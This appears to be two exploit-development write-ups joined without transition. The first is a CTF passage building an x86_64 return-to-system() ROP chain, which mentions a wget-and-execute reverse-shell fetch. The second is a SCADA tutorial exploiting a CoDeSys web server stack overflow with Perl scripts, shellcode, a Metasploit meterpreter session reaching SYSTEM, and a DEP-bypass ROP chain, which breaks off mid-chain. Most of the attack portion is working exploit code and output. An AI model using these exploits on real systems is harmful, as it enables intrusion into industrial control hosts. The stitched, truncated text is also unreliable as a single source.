0x7fffffffe5c8:	0x4242424242424242

The game VMs were configured with NX enabled and ASLR disabled, however we still needed to write the exploit without hardcoded stack addresses due to the differing environments of each team.

For a separate command injection exploit in the competition, our payload method was just to inject a wget + chmod + execute command which fetched a reverse shell from one of our boxes.  With ASLR disabled, it was decided the simplest path for this exploit would be just to return to system() and execute the same command string, saving the trouble of writing shellcode and marking a region of memory (writable-)executable.

Since the x86_64 calling convention on Linux passes arguments via registers starting at RDI, we’d need to ROP a little to store the address of our command string in RDI before calling system() without using hardcoded stack addresses.  So we fire up ROPeMe and slice apart libc:

sysadmin@ctf-portal:~/ropeme64$ ./ropshell64
Simple ROP interactive shell: [generate, load, search] gadgets
ROPeMe> generate /lib/x86_64-linux-gnu/libc.so.6 4
Generating gadgets for /lib/x86_64-linux-gnu/libc.so.6 with backward depth=4
It may take few minutes depends on the depth and file size...
Processing code block 1/2
Processing code block 2/2
Generated 22371 gadgets
Dumping asm gadgets to file: libc.so.6.ggt ...
OK

An initial search for gadgets that manipulate RDI produced some nice results:

ROPeMe> search mov rdi %
Searching for ROP gadget:  mov rdi % with constraints: []
0x163e02L: mov rdi [rdi+0x10] ; test rdi rdi ; jnz 0x163dfd ; pop rbx ;;
0x460d9L: mov rdi [rdi+0x68] ; xor eax eax ;;
0x6f2dcL: mov rdi [rdi+0xe0] ; jmp rax ; nop dword [rax] ; mov rax 0xffffffffffffffff ;;
0x6f38cL: mov rdi [rdi+0xe0] ; jmp rax ; nop dword [rax] ; xor eax eax ;;
0x487f0L: mov rdi rdx ; mov [rsi] al ; jnz 0x487d0 ; mov rax rsi ;;
0x11a194L: mov rdi rsp ; call rax ; add rsp 0x38 ;;
0x127d10L: mov rdi rsp ; call rdx ; add rsp 0x38 ;;

libc is nice enough to store the current RSP address to RDI and immediately CALL the value of either RAX or RDX.  If we store our command string directly at the end of the ROP chain, RDI should contain the correct address upon time of CALL.  We just need to find a “POP RAX” gadget to store the address of system() to and our exploit is complete.

ROPeMe> search pop rax
Searching for ROP gadget:  pop rax with constraints: []
0x23950L: pop rax ;;
0x476e7L: pop rax ;;
0x476e8L: pop rax ;;

The first one should do fine.  Add each gadget address to the base address of libc (0x7ffff6336000), obtained by inspecting /proc/pid/maps like so:

sysadmin@ctf-portal:~/ticket$ gdb --quiet ./movie
Reading symbols from /home/sysadmin/ticket/movie...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x400e7a
(gdb) run
Starting program: /home/sysadmin/ticket/movie 

Breakpoint 1, 0x0000000000400e7a in main ()
(gdb) shell
sysadmin@ctf-portal:~/ticket$ ps aux | grep movie
sysadmin  2662  0.2  1.0  50372 11160 pts/0    S    20:05   0:00 gdb --quiet ./movie
sysadmin  2664  0.0  0.0   4160   352 pts/0    t    20:05   0:00 /home/sysadmin/ticket/movie
sysadmin  2722  0.0  0.0   8104   920 pts/0    S+   20:05   0:00 grep --color=auto movie
sysadmin@ctf-portal:~/ticket$ grep libc /proc/2664/maps
7ffff7a1b000-7ffff7bd0000 r-xp 00000000 08:01 106                        /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7bd0000-7ffff7dcf000 ---p 001b5000 08:01 106                        /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7dcf000-7ffff7dd3000 r--p 001b4000 08:01 106                        /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7dd3000-7ffff7dd5000 rw-p 001b8000 08:01 106                        /lib/x86_64-linux-gnu/libc-2.15.so

And our finished PoC looks like:

sysadmin@ctf-portal:~/ticket$ sudo su -
root@ctf-portal:~# perl -e'print "a:b:" . "A"x1044 . "\x50\xe9\xa3\xf7\xff\x7f\x00\x00" . "\x60\x06\xa6\xf7\xff\x7f\x00\x00" . "\x94\x51\xb3\xf7\xff\x7f\x00\x00" . "/bin/sh"' > /usr/share/wordpress/data.txt
root@ctf-portal:~# logout
sysadmin@ctf-portal:~/ticket$ ./movie 'a:b'
2b7e6fb14408cb4f
$

Dissecting the exploit string for greater clarity:

Dissecting the exploit string for greater clarity:
"a:b:" . "A"x1044 .                  # Padding
"\x50\xe9\xa3\xf7\xff\x7f\x00\x00" . # POP RAX
"\x60\x06\xa6\xf7\xff\x7f\x00\x00" . # &system
"\x94\x51\xb3\xf7\xff\x7f\x00\x00" . # MOV RDI, RSP; CALL RAX
"/bin/sh"                            # String literal "/bin/sh"

The actual exploit string required delivery over HTTP POST and a second request to the home page to trigger the exploit.

Anatomy of a SCADA Exploit: Part 2 – From EIP to Shell

Last post, we identified a stack-based overflow in 3S CoDeSys CmpWebServer and traced the steps necessary to obtain control over EIP.  In order to do so, we needed to first circumvent stack cookies, which was achieved by abusing a call to memcpy() and overwriting the function call’s own return pointer.  This post, we’ll pick up where we left off and learn how to spawn a shell on the remote host.

We’ll be working with the same setup as last time, targeting CoDeSys v3.4 SP4 Patch 2 running on Windows XP SP3.  An important detail to note here is that while Windows XP SP3 implements DEP, it is by default only enabled on system-critical processes:

This means that the stack in our target application is free game and allows fully for a “traditional” overflow.  Now, I don’t know about you, but I happen to find that incredibly lame.  So, we’ll split the exploitation portion of this post into two sections.  In the first section, we’ll take full advantage of the resources provided to us and spawn a shell using the traditional return-into-shellcode method.  Since this series isn’t meant to be a simple walkthrough but instead a learning experience, in the second section we’ll spawn a shell again but instead enable DEP for the running application.  This disallows us from simply overwriting the return pointer with a pointer to the stack, so we’ll have to first disable DEP using Return-Oriented Programming (ROP) and then return into arbitrary code.

When Good Bytes Go Bad

Before we proceed to writing the exploit itself, we must first identify any bad characters that might cause issue later on – This means any bytes that may either get filtered out, translate to different bytes, or break the exploit altogether.  This is not typically a time-consuming task, but if many characters are filtered or manipulated by the program it can be tedious to identify exactly what is and isn’t allowed as input.

A quick and dirty way of approaching this is the “range method,” as suggested by the Metasploit development community.  Instead of linearly enumerating a range of 256 bytes and manually (or semi-automatically) testing each byte individually, we instead provide a broader range of bytes in each attempt and systematically narrow it down to specific offenders, somewhat akin to a binary search.

We can whip up a quick script (using the structure of the PoC from last post) to test:

#!/usr/bin/perl

use IO::Socket;

if ( @ARGV < 1 ) {
    print "Usage: $0 <target>";
}

$sock = new IO::Socket::INET(
    PeerAddr => $ARGV[0],
    PeerPort => 8080,
);

$badchars = "";
$badchars .= "GET /";
$badchars .= pack("C*", 0x00 .. 0x0f);
#$badchars .= pack("C*", 0x10 .. 0x1f);
#$badchars .= pack("C*", 0x20 .. 0x2f);
#$badchars .= pack("C*", 0x30 .. 0x3f);
#$badchars .= pack("C*", 0x40 .. 0x4f);
#$badchars .= pack("C*", 0x50 .. 0x5f);
#$badchars .= pack("C*", 0x60 .. 0x6f);
#$badchars .= pack("C*", 0x70 .. 0x7f);
#$badchars .= pack("C*", 0x80 .. 0x8f);
#$badchars .= pack("C*", 0x90 .. 0x9f);
#$badchars .= pack("C*", 0xa0 .. 0xaf);
#$badchars .= pack("C*", 0xb0 .. 0xbf);
#$badchars .= pack("C*", 0xc0 .. 0xcf);
#$badchars .= pack("C*", 0xd0 .. 0xdf);
#$badchars .= pack("C*", 0xe0 .. 0xef);
#$badchars .= pack("C*", 0xf0 .. 0xff);
$badchars .= "\\a HTTP/1.0\r\n\r\n";

print $sock $badchars;

Run the script against CoDeSys, and…

Well that’s interesting.  Looks like none of our input was copied into the buffer, predictably due to the initial null byte.  Since the section of code we’ve looked at thus far has used memcpy() as opposed to strcpy(), it’s reasonable to assume that string functions like strlen() are used at some point beforehand and are causing our buffer to terminate prematurely.  We’ll add 0×00 to the list of bad chars and try again.

$badchars .= "GET /";
# Bad chars: "\x00"
$badchars .= pack("C*", 0x01 .. 0x0f);

Taking a look at the stack after the memcpy():

What the heck?  Something else in the range must be causing issue.  Let’s narrow the range:

$badchars .= pack("C*", 0x01 .. 0x09);
#$badchars .= pack("C*", 0x0a .. 0x0f);

And finally we have success:

If you look closely, though, notice that 0×09 was translated to 0×20, so we’ll add it to the list of bad chars as well.

To expedite the process and save time, we won’t detail the rest of the testing.  Following the same steps as outlined above for the remaining bytes, we produce the final list of bad characters to avoid when writing our exploit:

0x00 (Null) - Breaks request
0x09 (Tab) - Translates to 0x20 (Space)
0x0a (Carriage Return) - Breaks request
0x23 (#) - Breaks request
0x25 (%) - Breaks request
0x3a (:) - Breaks request
0x3d (=) - Breaks request
0x3f (?) - Breaks request
0x5c (\) - Translates to 0x2f (/)

As we can see, most of the offending bytes are URL special characters.  With more thorough testing and analysis we realize that, in actuality, some of the chars can be used if positioned correctly in the buffer, but to save potential frustration we’ll just blacklist them initially and consider their usage only if necessary.

SCADA Wars Episode 1 – The Shellcode Menace

Writing a traditional stack-based overflow is a rather straight-forward process when both DEP and ASLR are disabled/not implemented.  Simply overwrite the return pointer on the stack with a pointer to your buffer, slide down an optional NOP sled, and execute your shellcode.  Recall the script we wrote last post that obtained arbitrary control over EIP (cleaned up a bit to remove the no longer necessary cyclic pattern):

#!/usr/bin/perl

use IO::Socket;

if ( @ARGV < 1 ) {
    print "Usage: $0 <target>";
}

$sock = new IO::Socket::INET(
    PeerAddr => $ARGV[0],
    PeerPort => 8080,
);

$exploit = "";
$exploit .= "GET /";
$exploit .= "A"; # For alignment purposes
$exploit .= pack('V', 0x0defaced); # Control over EIP
$exploit .= "A"x524;
$exploit .= pack('V', 0x02cdfb4c); # Readable pointer (Pointer to new EIP)
$exploit .= pack('V', 0x02cdfa14); # Writable pointer (Overwritten ret addr)
$exploit .= "A"x463;
$exploit .= "\\a HTTP/1.0\r\n\r\n";

print $sock $exploit;

Running against the target web server, we observe an exception executing at our (invalid) return address:

At this point we’ll inspect the stack to learn the location of our buffer, noting the beginning address of the second string of “A”s where we’ll place our shellcode:

Updating our script to reflect this new information, as well as the inclusion of a benign payload for PoC:

#!/usr/bin/perl

use IO::Socket;

if ( @ARGV < 1 ) {
    print "Usage: $0 <target>";
}

$sock = new IO::Socket::INET(
    PeerAddr => $ARGV[0],
    PeerPort => 8080,
);

# Windows XP SP3 EN Calc Shellcode 16 Bytes by John Leitch
$shellcode =
    "\x31\xC9"              . # xor ecx,ecx
    "\x51"                  . # push ecx
    "\x68\x63\x61\x6C\x63"  . # push 0x636c6163
    "\x54"                  . # push dword ptr esp
    "\xB8\xC7\x93\xC2\x77"  . # mov eax,0x77c293c7
    "\xFF\xD0";               # call eax

$exploit = "";
$exploit .= "GET /";
$exploit .= "A"; # For alignment purposes
$exploit .= pack('V', 0x02cdfc2c); # Control over EIP, pointer to shellcode
$exploit .= "A"x524;
$exploit .= pack('V', 0x02cdfb4c); # Readable pointer (Pointer to new EIP)
$exploit .= pack('V', 0x02cdfa14); # Writable pointer (Overwritten ret addr)
$exploit .= $shellcode;
$exploit .= "\\a HTTP/1.0\r\n\r\n";

print $sock $exploit;

And the result:

Cool.  We’ve successfully exploited this version of CoDeSys on Windows XP SP3.

There are two issues with our current exploit, though.  For the consideration of functionality, calc.exe is rather boring and doesn’t actually spawn us a shell.  Additionally, for the consideration of elegance and standardization, it’s best not to write standalone exploit scripts such as the one above.  To the rescue is the Metasploit Framework, which provides a very nice exploit development API, as well as a long list of payloads and encoding utilities to circumvent bad characters and potential IDS.  Resultingly, as of revision bc9014e9, the CoDeSys CmpWebServer exploit module in Metasploit now possesses a target for v3.4 SP4 Patch 2 on Windows XP SP3.  Let’s test it out:

msf > use exploit/windows/scada/codesys_web_server
msf  exploit(codesys_web_server) > show options

Module options (exploit/windows/scada/codesys_web_server):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  8080             yes       The target port

msf  exploit(codesys_web_server) > set RHOST 172.16.66.128
RHOST => 172.16.66.128
msf  exploit(codesys_web_server) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   CoDeSys v2.3 on Windows XP SP3
   1   CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3

msf  exploit(codesys_web_server) > set TARGET 1
TARGET => 1
msf  exploit(codesys_web_server) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf  exploit(codesys_web_server) > exploit

[*] Started bind handler
[*] Trying target CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3...
[*] Sending stage (752128 bytes) to 172.16.66.128
[*] Meterpreter session 1 opened (172.16.66.1:60855 -> 172.16.66.128:4444) at 2012-01-14 03:31:41 -0500

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam

Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

SCADA Wars Episode 2 – Attack of the Stack

It’s very rare nowadays to approach a bug without the expectation of needing to bypass at least one or two exploit mitigation techniques.  These memory protection mechanisms are most commonly a coupling of DEP and ASLR, but since we are targeting an older version of Windows, ASLR has not been implemented yet, and, as mentioned earlier, even though DEP has been implemented it is in fact disabled for all user applications by default, including CoDeSys.

To make things more interesting, let’s manually enable DEP and rewrite our exploit.

With the stack marked non-executable, we won’t be able to directly return into code we introduce in memory but instead have to rely on Return-Oriented Programming (ROP).  By chaining together the tails of function calls (referred to as ROP gadgets), we can execute arbitrary code piece-by-piece, most commonly to achieve the end goal of disabling DEP and returning into shellcode.

Instead of writing one from scratch, we’ll begin with a DEP-disabling ROP chain from Corelan Team’s ROPdb and adapt it to our exploit.  While the published chains are meant to function without alteration, we need to mind our list of bad chars and find replacement gadgets for any pointers affected.  Comparing the chains in ROPdb with the list of loaded modules, it’s apparent that the only DLL with a readily available chain is advapi32.dll, which disables DEP by performing a call to the NtSetInformationProcess function:

Starting with the same base exploit structure as above, we’ll append the ROP chain and identify any offending pointers (denoted with a string of exclamation points):

#!/usr/bin/perl

use IO::Socket;

if ( @ARGV < 1 ) {
    print "Usage: $0 <target>";
}

$sock = new IO::Socket::INET(
    PeerAddr => $ARGV[0],
    PeerPort => 8080,
);

$exploit = "";
$exploit .= "GET /";
$exploit .= "A"; # For alignment purposes
$exploit .= pack('V', 0x0defaced); # Control over EIP
$exploit .= "A"x524;
$exploit .= pack('V', 0x02cdfb4c); # Readable pointer (Pointer to new EIP)
$exploit .= pack('V', 0x02cdfa14); # Writable pointer (Overwritten ret addr)

# advapi32.dll ntdll.ZwSetInformationProcess() chain by corelanc0d3r
# https://www.corelan.be/index.php/security/corelan-ropdb/
$exploit .= pack('V', 0x77e25c1f); # !!!!! # POP EAX # RETN
$exploit .= pack('V', 0x77dd1404); # * &NtSetInformationProcess
$exploit .= pack('V', 0x77dfd448); # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04
$exploit .= pack('V', 0xffffffff); # (EBP)
$exploit .= pack('V', 0x77e18a5f); # INC EBP # RETN (set EBP to 0)
$exploit .= pack('V', 0x41414141); # junk (compensate)
$exploit .= pack('V', 0x77e01143); # XOR EBP,EAX # RETN
$exploit .= pack('V', 0x77e25c1f); # !!!!! # POP EAX # RETN
$exploit .= pack('V', 0xffffffde); # -> 0x22 -> EDX
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77df563a); # !!!!! # XCHG EAX,EBX # RETN
$exploit .= pack('V', 0x77de97ac); # MOV EDX,EBX # POP ESI # POP EBX # RETN 10
$exploit .= pack('V', 0x77e3cb79); # RETN -> ESI
$exploit .= pack('V', 0xffffffff); # -> EBX
$exploit .= pack('V', 0x77ddbf44); # POP ECX # RETN
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x77e4b1fc); # ptr to 0x02
$exploit .= pack('V', 0x77e25c1f); # !!!!! # POP EAX # RETN
$exploit .= pack('V', 0xfffffffc); # -> 0x4
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77e3cb78); # POP EDI # RETN
$exploit .= pack('V', 0x77e3cb79); # RETN
$exploit .= pack('V', 0x77de75ed); # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN

$exploit .= "\\a HTTP/1.0\r\n\r\n";

print $sock $exploit;

Not too bad; we only need to find replacements for two gadgets.  We’ll use mona.py to generate a list of gadgets and go from there.

The script displays a great deal of debugging information to the console as well as some automatically generated DEP-disabling ROP chains of its own, but the actual results we’re looking for are in rop.txt under Immunity’s installation directory.  It would be easy enough just to use the chains generated by the command, but as we can see there they make frequent use of our blacklisted characters:

The first replacement gadget we need to find is “pop eax; ret”.  This is a fairly common instruction sequence since the x86 calling convention typically stores the return value in EAX, so we should have no issue finding a suitable replacement.

We’ll first grep for all “pop eax” gadgets whose address doesn’t start with a null byte:

$ grep "POP EAX" rop.txt | grep -v 0x00 | cut -d* -f1 | head
0x1000c0be : # PUSH ECX # PUSH EAX # POP EAX # POP ECX # POP EBP # POP ECX # POP EBX # RETN 04
0x1000c0bf : # PUSH EAX # POP EAX # POP ECX # POP EBP # POP ECX # POP EBX # RETN 04
0x1000654e : # POP EAX # POP ESI # RETN
0x10006590 : # POP EAX # POP ESI # RETN
0x10007bfb : # POP EAX # POP ESI # RETN
0x10007771 : # POP EAX # POP ESI # RETN
0x10007747 : # POP EAX # RETN
0x1000fd85 : # POP EAX # POP ESI # RETN
0x10007d59 : # POP EAX # POP ESI # RETN
0x10007697 : # POP EAX # RETN

Great, but so far every gadget still has a null byte in the address.  Let’s restrict our search a little more to filter out all pointers starting with 0×1000:

$ grep "POP EAX" rop.txt | grep -v 0x00 | grep -v 0x1000 | cut -d* -f1
$

Interestingly enough, no suitable replacement gadgets exist in the results.  One thing to note, though, is that mona.py defaults its ROP generation to non-OS modules (as well as non-ASLR and non-rebase), so we’ll have to broaden our scope a bit to find the gadget we need. Because the overall goal is to make exploits as universal as possible (working against a wide array of target systems and versions), it’s best to not use modules provided by the system itself since they have a high likelihood of changing between OS versions.  However, we’ll take a hit here for the sake of getting a working PoC.

We’ll regenerate our list of ROP gadgets, this time restricting ourselves to the system DNSAPI.dll module by passing the -m flag to mona.py:

!mona rop -m DNSAPI.dll

This graces us with the following gadget list to search through:

$ grep "POP EAX" rop_dnsapi.txt | cut -d* -f1
0x76f3e0c8 : # ADD EBP,DWORD PTR DS:[EDX+57] # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 10
0x76f3c976 : # POP EAX # MOV DWORD PTR DS:[EDX],EAX # XOR EAX,EAX # RETN
0x76f3c97e : # POP EAX # RETN
0x76f3e0ca : # PUSH EDI # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 10
0x76f3e0cb : # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 10
0x76f3c974 : # PUSH 3 # POP EAX # MOV DWORD PTR DS:[EDX],EAX # XOR EAX,EAX # RETN
0x76f3e0c9 : # PUSH 57 # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 10
0x76f3c971 : # OR BYTE PTR SS:[EBP+8],DH # PUSH 3 # POP EAX # MOV DWORD PTR DS:[EDX],EAX # XOR EAX,EAX # RETN
0x76f3c973 : # OR BYTE PTR DS:[EDX+3],CH # POP EAX # MOV DWORD PTR DS:[EDX],EAX # XOR EAX,EAX # RETN
0x76f3c97c : # PUSH 0D # POP EAX # RETN

Perfect, the gadget at 0x76f3c97e will work fine.  Update our ROP chain:

# advapi32.dll ntdll.ZwSetInformationProcess() chain by corelanc0d3r
# https://www.corelan.be/index.php/security/corelan-ropdb/
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0x77dd1404); # * &NtSetInformationProcess
$exploit .= pack('V', 0x77dfd448); # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04
$exploit .= pack('V', 0xffffffff); # (EBP)
$exploit .= pack('V', 0x77e18a5f); # INC EBP # RETN (set EBP to 0)
$exploit .= pack('V', 0x41414141); # junk (compensate)
$exploit .= pack('V', 0x77e01143); # XOR EBP,EAX # RETN
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xffffffde); # -> 0x22 -> EDX
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77df563a); # !!!!! # XCHG EAX,EBX # RETN
$exploit .= pack('V', 0x77de97ac); # MOV EDX,EBX # POP ESI # POP EBX # RETN 10
$exploit .= pack('V', 0x77e3cb79); # RETN -> ESI
$exploit .= pack('V', 0xffffffff); # -> EBX
$exploit .= pack('V', 0x77ddbf44); # POP ECX # RETN
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x77e4b1fc); # ptr to 0x02
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xfffffffc); # -> 0x4
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77e3cb78); # POP EDI # RETN
$exploit .= pack('V', 0x77e3cb79); # RETN
$exploit .= pack('V', 0x77de75ed); # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN

One last gadget we need to find a replacement for is “xchg eax, ebx; ret”.  We’ll grep through rop.txt and see if there are any candidates:

$ grep "XCHG EAX,EBX" rop.txt | cut -d* -f1
0x0040fcb3 : # XCHG EAX,EBX # XOR EAX,E58B0000 # POP EBP # RETN
0x0040dab3 : # XCHG EAX,EBX # PUSH EDI # ADD BYTE PTR DS:[EAX],AL # MOV ESP,EBP # POP EBP # RETN

Bad luck.  Looks like we’ll have to rely on a system module again.  However, DNSAPI.dll doesn’t seem to have the gadget either:

$ grep "XCHG EAX,EBX" rop_dnsapi.txt | cut -d* -f1
$

Let’s generate a list of gadgets from the system SHELL32.dll module and see if something there will help us:

$ grep "XCHG EAX,EBX" rop_shell32.txt | cut -d* -f1 | head
0x7ca04919 : # XCHG EAX,EBX # SUB BH,DH # DEC ECX # RETN
0x7ca6f081 : # XCHG EAX,EBX # RETN 00
0x7cb4f687 : # XCHG EAX,EBX # ADD AX,3B00 # RETN
0x7ca7870a : # XCHG EAX,EBX # MOV EBP,17C # ADD BH,BH # ADC EAX,<&USER32.EndDialog> # XOR EAX,EAX # POP EBP # RETN 10
0x7ca17509 : # XCHG EAX,EBX # PUSH EAX # ADD EAX,DWORD PTR DS:[EAX] # POP EDI # XOR EAX,EAX # POP ESI # INC EAX # POP EBX # POP EBP # RETN 0C
0x7ca787d8 : # XCHG EAX,EBX # MOV EBP,17C # ADD BH,BH # ADC EAX,<&USER32.EndDialog> # MOV EAX,ESI # POP ESI # POP EBP # RETN 10
0x7ca11f36 : # XCHG EAX,EBX # OR AL,BYTE PTR DS:[EAX] # XOR EAX,EAX # RETN 04
0x7caab0cd : # XCHG EAX,EBX # POP ES # ADD BYTE PTR DS:[EBX],BH # RETN
0x7ca3ae19 : # XCHG EAX,EBX # ADD DWORD PTR DS:[EAX],EAX # ADD BYTE PTR DS:[EBX+5D5E5FC7],CL # RETN 04
0x7ca034ed : # XCHG EAX,EBX # SAHF # ADD AL,BYTE PTR DS:[EAX] # POP EDI # POP ESI # POP EBP # RETN 08

The gadget at 0x7ca6f081 will do perfectly.  The 00 in “RETN 00″ denotes the number of bytes the stack will by adjusted by upon return, which in this case is 0 and parallels the functionality of a “normal” return.

The question can be asked in this scenario, why is there such an instruction “ret 0″ in the module if it’s the exact same as a “ret”?  The answer is that the instruction isn’t actually meant to be there at all.  The x86 architecture sports a number of properties favorable for exploit development, namely the fact that instructions are both variable-length and unaligned.  x86 instructions aren’t always a defined length in memory, unlike ARM or MIPS whose instructions are always 2 or 4 bytes wide, so we can find a single useful opcode and disassemble backwards until we find an acceptable sequence of instructions.  By being unaligned, we can execute instructions at any offset and are not restricted to returning into addresses that, for example, end in 0×0, 0×4, 0×8, or 0xc.

To demonstrate this, we’ll start by disassembling our gadget at 0x7ca6f081, where we see the desired instruction sequence:

However, by simply pressing the “up” button, our disassembly realigns to the program’s proper instruction alignment, and we see that these opcodes are actually part of a CALL:

Moving ahead, let’s update our ROP chain with the final replacement gadget:

# advapi32.dll ntdll.ZwSetInformationProcess() chain by corelanc0d3r
# https://www.corelan.be/index.php/security/corelan-ropdb/
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0x77dd1404); # * &NtSetInformationProcess
$exploit .= pack('V', 0x77dfd448); # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04
$exploit .= pack('V', 0xffffffff); # (EBP)
$exploit .= pack('V', 0x77e18a5f); # INC EBP # RETN (set EBP to 0)
$exploit .= pack('V', 0x41414141); # junk (compensate)
$exploit .= pack('V', 0x77e01143); # XOR EBP,EAX # RETN
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xffffffde); # -> 0x22 -> EDX
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x7ca6f081); # XCHG EAX,EBX # RETN
$exploit .= pack('V', 0x77de97ac); # MOV EDX,EBX # POP ESI # POP EBX # RETN 10
$exploit .= pack('V', 0x77e3cb79); # RETN -> ESI
$exploit .= pack('V', 0xffffffff); # -> EBX
$exploit .= pack('V', 0x77ddbf44); # POP ECX # RETN
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x41414141); # compensate
$exploit .= pack('V', 0x77e4b1fc); # ptr to 0x02
$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0xfffffffc); # -> 0x4
$exploit .= pack('V', 0x77dd9b16); # NEG EAX # RETN
$exploit .= pack('V', 0x77e3cb78); # POP EDI # RETN
$exploit .= pack('V', 0x77e3cb79); # RETN
$exploit .= pack('V', 0x77de75ed); # PUSHAD # DEC EBX # MOV EBX,33C233F6 # RETN

Now that our ROP chain is all set, we need to actually be able to execute it.  The easy way to do this is to simply return into the first gadget upon gaining control over EIP.  At the moment, we corrupt EIP with the value 0x0defaced, so it should be simple enough to just restructure our exploit and relocate the ROP chain in place of this dummy value.  In order to prevent changes to stack offsets and addresses, we’ll store a placeholder where the ROP chain used to be to keep our input to the program the same length:

#!/usr/bin/perl

use IO::Socket;

if ( @ARGV < 1 ) {
    print "Usage: $0 ";
}

$sock = new IO::Socket::INET(
    PeerAddr => $ARGV[0],
    PeerPort => 8080,
);

$exploit = "";
$exploit .= "GET /";
$exploit .= "A"; # For alignment purposes

$exploit .= pack('V', 0x76f3c97e); # POP EAX # RETN
$exploit .= pack('V', 0x77dd1404); # * &NtSetInformationProcess
$exploit .= pack('V', 0x77dfd448); # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 04
$exploit .= pack('V', 0xffffffff); # (EBP)
$exploit .= pack('V', 0x77e18a5f); # INC EBP # RETN (set EBP to 0)
$exploit .= pack('V', 0x41414141); # junk (compensate)
